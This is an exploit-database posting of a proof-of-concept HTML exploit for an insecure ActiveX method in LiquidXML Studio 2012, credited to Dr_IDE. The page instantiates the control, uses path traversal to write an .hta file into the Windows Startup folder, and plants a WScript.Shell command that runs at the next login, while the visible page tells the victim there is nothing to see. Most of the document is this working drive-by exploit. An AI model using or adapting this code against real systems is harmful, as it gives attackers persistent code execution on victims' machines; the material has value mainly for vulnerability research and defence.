LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day



EKU-ID: 3101 CVE: OSVDB-ID:
Author: Dr_IDE Published: 2013-03-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<html>
<object classid='clsid:8AEEAB4A-E1DA-4354-B800-8F0B553770E1' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2012 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {8AEEAB4A-E1DA-4354-B800-8F0B553770E1}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Nothing to see here, you can close the browser now...
</body>
</html>